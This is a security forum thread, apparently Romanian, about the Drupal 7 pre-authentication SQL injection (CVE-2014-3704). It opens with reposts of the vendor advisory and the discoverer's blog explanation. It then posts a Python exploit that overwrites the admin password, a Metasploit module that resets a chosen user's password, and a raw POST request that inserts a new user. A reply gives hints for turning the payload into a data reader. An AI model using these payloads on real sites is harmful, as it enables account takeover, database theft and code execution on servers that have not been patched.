Jump to content
Nytro

Drupal 7.31 pre Auth SQL Injection Vulnerability

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]SA-CORE-2014-005 - Drupal core - SQL injection[/h] Posted by Drupal Security Team on October 15, 2014 at 4:02pm

[h=2]Description[/h] Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

This vulnerability can be exploited by anonymous users.

[h=2]CVE identifier(s) issued[/h]

  • CVE-2014-3704

[h=2]Versions affected[/h]

  • Drupal core 7.x versions prior to 7.32.

[h=2]Solution[/h] Install the latest version:

If you are unable to update to Drupal 7.32 you can apply this patch to Drupal's database.inc file to fix the vulnerability until such time as you are able to completely upgrade to Drupal 7.32.

Also see the Drupal core project page.

[h=2]Reported by[/h]

  • Stefan Horst

[h=2]Fixed by[/h]

[h=2]Coordinated by[/h]

[h=2]Contact and More Information[/h] We've prepared a FAQ on this release. Read more at https://www.drupal.org/node/2357241.

The Drupal security team can be reached at security at drupal.org or via the contact form at

https://www.drupal.org/contact.

Sursa: https://www.drupal.org/SA-CORE-2014-005

Link to comment
Share on other sites
Nytro Mentor

Nytro

Posted
  • Author
Posted

Drupal 7.31 pre Auth SQL Injection Vulnerability

Posted: 2014-10-15 10:20 by Stefan Horst | Auf Deutsch lesen | More posts about Blog PHP Vulnerabilities

Introduction

drupalgeddon_small.png

is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world.

Drupal 7 is used by a vast number of sites and all of them are vulnerable.

During a sourcecode audit for a customer we found an SQL Injection Vulnerability in Drupal's core handling of SQL queries, which we disclosed to the vendor. With this bug an attacker can gain full control over all Drupal sites (Admin privileges), without knowledge of internals or authentication on the site. He can even execute PHP Code without leaving a trace in any log.

The Bug was introduced in early 2011 and stayed well hidden in the core framework.

In this post we will discuss the SQL Injection on a higher level. If you want all technical details please refer to the Advisory we released

We will wait until enough sites had time to update before we release a PoC, since this is a severe bug, which allows an attacker to execute arbitrary code with only one HTTP request and no knowledge of the site whatsoever.

The Vulnerability

All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:

SELECT * FROM {users} WHERE name IN (:name_0, :name_1)

This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this:

SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)

which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example.

If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.

Stefan Horst

Sursa: https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html

Link to comment
Share on other sites
SirGod Contributor

SirGod

Posted
Posted

The Vulnerability

All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:

SELECT * FROM {users} WHERE name IN (:name_0, :name_1)

This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this:

SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)

which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example.

If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.

Sursa ?i articol full:

https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html

Link to comment
Share on other sites
Nytro Mentor

Nytro

Posted
  • Author
Posted

[h=1]Drupal 7.x SQL Injection SA-CORE-2014-005[/h]

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

Exploit: [Python] Drupal 7.x SQL Injection SA-CORE-2014-005 - Pastebin.com

Link to comment
Share on other sites
SirGod Contributor

SirGod

Posted
Posted
Mersi Nytro.

Stie cineva cum se poate citi o valoare din DB in loc de update?

Hint 1:

MySQL :: MySQL 5.0 Reference Manual :: 13.2.8 SELECT Syntax

Hint 2: variabila "post_data" trebuie modificata:

"name[0%20;update+users+set+name%3d\'" \            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

Hint 3: vector[cheie]

Hint 4: urldecode

Hint 5: escape

Hint 6: concatenare

Bafta! :-)

Link to comment
Share on other sites
mrreboot Newbie

mrreboot

Posted
Posted

Pentru metasploit 


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal 7 SQL Injection - Password Change',
'Description' => %q{
This module exploits a SQL injection vulnerability in
Drupal 7 to update the password of a selected user
to 'drupal'
},
'Author' =>
[
'Stefan Horst', # Vulnerability discovery
'Charlie Briggs'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2014-3704'],
['URL', 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'],
['URL', 'https://www.drupal.org/SA-CORE-2014-005']
],
'DisclosureDate' => 'Oct 15 2014'))
register_options(
[
OptString.new('TARGETURI', [true, "The full URI to Drupal", "/"]),
OptString.new('USERNAME', [true, "Username of target user", "admin"])
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
if res and res.code == 200 and res.body.to_s =~ /form_build_id/
return Msf::Exploit::CheckCode::Appears
end
return Msf::Exploit::CheckCode::Safe
end
def run
print_status("#{peer} - Attempting to update password hash for user '#{datastore['USERNAME']}'")
hash = "$S$Drl0vgZ9yuU9uc4JyaTMHxMPriC7q/PsOUOx52fCrVQSTpI/Tu4x"
sqli = "name[lol;update+{users}+set+pass%3d'#{hash}'+where+name%3d'#{datastore['USERNAME']}';--]=lol&name[lol]=lol&pass=lol&&form_build_id=lol&form_id=user_login&op=Log+in"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'q' => 'user',
},
'data' => sqli
})
if res and res.code == 200
print_status("#{peer} - Received 200, checking ability to login...")
check_login(datastore['USERNAME'], 'drupal')
else
print_error("Rut roh. Something went wrong :/")
end
end
def check_login(username, password)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'q' => 'user'
},
'vars_post' => {
'name' => username,
'pass' => password,
'form_build_id' => 'lol',
'form_id' => 'user_login',
'op' => 'Log In'
}
})
if res and res.code == 302
print_status("#{peer} - Received 302, following...")
redirect = URI(res.headers['Location']).path
cookie = res.headers['Set-Cookie']
res = send_request_cgi({
'method' => 'GET',
'uri' => redirect,
'headers' => {
'Cookie' => cookie
}
})
if res and res.code == 200
check_content(res.body.to_s, username, password)
end
elsif res and res.code == 200
check_content(res.body.to_s, username, password)
end
end
def check_content(body, username, password)
if body !=~ /not-logged-in/
print_good("Success! Logged in as #{username}:#{password}")
else
print_error("Unable to log in, perhaps this site is patched!")
end
end
end

https://github.com/cnbriggs/stuff/blob/master/drupal_7_sqli.rb

Link to comment
Share on other sites
Nytro Mentor

Nytro

Posted
  • Author
Posted

[h=1]Drupal CVE-2014-3704 insert new user[/h]

POST /drupal/?q=node&destination=node HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.88.88
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko
Content-Type: application/x-www-form-urlencoded
Content-Length: 258

name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...